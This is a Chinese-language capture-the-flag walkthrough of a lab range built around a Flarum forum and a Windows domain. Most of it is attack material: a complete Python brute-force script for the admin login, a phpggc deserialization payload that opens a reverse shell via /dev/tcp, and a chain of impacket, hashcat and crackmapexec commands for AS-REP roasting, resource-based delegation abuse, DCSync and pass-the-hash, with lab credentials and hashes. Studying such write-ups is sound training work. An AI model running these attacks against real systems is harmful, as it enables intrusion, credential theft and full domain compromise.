春秋云境-Flarum

用rockyou.txt爆破后台密码，用户名为administrator

import requests
import json

# Define the target URL and headers based on the provided HTTP request
url = "http://39.99.145.57/login"
headers = {
    "Host": "39.99.145.57",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0",
    "Accept": "*/*",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate, br",
    "Referer": "http://39.99.145.57/",
    "Content-Type": "application/json; charset=utf-8",
    "X-CSRF-Token": "BGMRkYNmoTorcp7Z7y0alTNUpBgAObn0ajWOCXjw",
    "Origin": "http://39.99.145.57",
    "Connection": "close",
    "Cookie": "flarum_session=HP5SjfzKojWBS5DalIA3k1x4i0o0CEwZWR2o6hfc",
    "Priority": "u=0"
}

# Path to the text file containing passwords
password_file = "rockyou.txt"

# Base payload structure
base_payload = {
    "identification": "administrator",
    "password": "",
    "remember": False
}

def try_login(password):
    # Update payload with the current password
    payload = base_payload.copy()
    payload["password"] = password

    try:
        # Send POST request
        response = requests.post(url, headers=headers, json=payload, timeout=5)

        if response.status_code == 200 and "error" not in response.text.lower():
            print(f"Password: {password}")
            print(f"Status Code: {response.status_code}")
            print(f"Response: {response.text[:200]}...") 
            return True
        return False

    except requests.exceptions.RequestException as e:
        print(f"Error with password {password}: {e}")
        return False

def main():
    try:
        # Read passwords from file
        with open(password_file, 'r', encoding='utf-8') as file:
            passwords = [line.strip() for line in file if line.strip()]

        print(f"Found {len(passwords)} passwords to try.")

        # Try each password
        for password in passwords:
            if try_login(password):
                print(f"Success! Valid password found: {password}")
                break
        else:
            print("No valid password found.")

    except FileNotFoundError:
        print(f"Error: {password_file} not found.")
    except Exception as e:
        print(f"An unexpected error occurred: {e}")

if __name__ == "__main__":
    main()
'''
Found 14344382 passwords to try.
Password: 1chris
Status Code: 200
Response: {"token":"HMtVKZciPe3dCM549hF55R8MVPD83hMqB3dU6oCh","userId":1}...
Success! Valid password found: 1chris
'''

成功进入后台，可以查到这里有RCE的漏洞，用phpggc生成一下payload

1	./phpggc -p tar -b Monolog/RCE6 system "bash -c 'bash -i >& /dev/tcp/ip/23333 0>&1'"

管理后台-外观-自定义样式填进去

1	@import (inline) 'data:text/css;base64,xxx';

再用phar协议包含一下

1
2
3

.test {
  content: data-uri('phar://./assets/forum.css');
}

成功弹shell

先写个马进去方便用蚁剑连上

capabilities提权

可以用openssl任意文件读

扫内网

搭建frp

在数据库中找到一个账密

连上数据库

找到了大量用户名

打AS-REP

1	proxychains4 impacket-GetNPUsers -dc-ip 172.22.60.8 xiaorang.lab/ -usersfile users.txt

成功找到了两条hash

爆破hash，爆出了其中一个的明文

1	hashcat -a 0 -m 18200 --force hash.txt /usr/share/wordlists/rockyou.txt

rdp连上172.22.60.15，看到里面有个xshell

直接用工具提取出其中的账号密码

收集一下域信息

1	proxychains4 bloodhound-python -u wangyun -p Adm12geC -d xiaorang.lab -c all -ns 172.22.60.8 --zip --dns-tcp

zhangxin用户属于Account Operators组

FILESERVER对域有GetChanges和GetChangesAll权限，因此可以DCSync Attack

打RBCD

添加机器用户

1	proxychains4 impacket-addcomputer xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -dc-host xiaorang.lab -computer-name 'HACK$' -computer-pass '1q2w3e4r!'

配置属性

1	proxychains4 impacket-rbcd xiaorang.lab/zhangxin:'admin4qwY38cc' -dc-ip 172.22.60.8 -action write -delegate-to 'FILESERVER$' -delegate-from 'HACK$'

获取ST

1	proxychains4 impacket-getST xiaorang.lab/'HACK$':'1q2w3e4r!' -spn cifs/Fileserver.xiaorang.lab -impersonate Administrator -dc-ip 172.22.60.8

修改/etc/hosts

ptt拿flag

1 2	export KRB5CCNAME=Administrator@cifs_Fileserver.xiaorang.lab@XIAORANG.LAB.ccache proxychains4 impacket-psexec Administrator@FILESERVER.xiaorang.lab -k -no-pass -dc-ip 172.22.60.8

抓一下fileserver的哈希

1	proxychains4 impacket-secretsdump -k -no-pass FILESERVER.xiaorang.lab -dc-ip 172.22.60.8

用FILESERVER$机器账户进行DCSync攻击拿域控管理员哈希

1	proxychains4 impacket-secretsdump xiaorang.lab/'FILESERVER$':@172.22.60.8 -hashes ':951d8a9265dfb652f42e5c8c497d70dc' -just-dc-user Administrator

pth拿剩下两个flag

1	proxychains4 crackmapexec smb 172.22.60.8 -u administrator -H c3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag04.txt"

1	proxychains4 crackmapexec smb 172.22.60.15 -u administrator -H c3cfdc08527ec4ab6aa3e630e79d349b -d xiaorang.lab -x "type C:\Users\Administrator\flag\flag02.txt"